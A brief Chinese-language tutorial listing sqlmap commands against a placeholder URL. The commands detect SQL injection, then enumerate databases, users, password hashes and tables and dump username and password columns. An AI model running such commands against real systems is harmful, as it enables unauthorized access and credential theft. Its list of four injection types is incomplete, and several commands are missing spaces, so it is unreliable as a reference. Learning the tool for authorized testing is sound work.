sqlmap使用方法

sqlmap使用：

注入类型有四种分别为：boolean-based blind、error-based、stacked queries、inline query。

sqlmap.py -u 'http://www.example.com/xxx.php?id=1' #-u 注入点　　　检测注入点是否可用
sqlmap.py -u 'http://www.example.com/xxx.php?id=1' --dbs　　　 #可曝出该sqlserver中所有数据库名称
sqlmap.py -u 'http://www.example.com/xxx.php?id=1' --current-db　　　#web当前使用的数据库
sqlmap.py -u 'http://www.example.com/xxx.php?id=1' --current-user　　＃web数据库使用账户
sqlmap.py -u 'http://www.example.com/xxx.php?id=1' --users　　　　＃列出sql所有用户
sqlmap.py -u 'http://www.example.com/xxx.php?id=1'--passwords　　　＃数据库账户与密码
sqlmap.py -u 'http://www.example.com/xxx.php?id=1'--tables　　　　＃输出所有的表
sqlmap.py -u 'http://www.example.com/xxx.php?id=1'-D 【数据库名】 --tables　　＃-D 指定数据库名

sqlmap.py -u 'http://www.example.com/xxx.php?id=1' -D 【数据库名】 -T 【表名】 --columns　　＃-T：指定要列出字段的表　　　--columns　列出了所有的列字段

sqlmap.py -u 'http://www.example.com/xxx.php?id=1' -D 【数据库名】 -T 【表名】 -C　"username,realname,password" --dump　　　　　＃　-C ：指定要暴的字段　　--dump：将结果导出。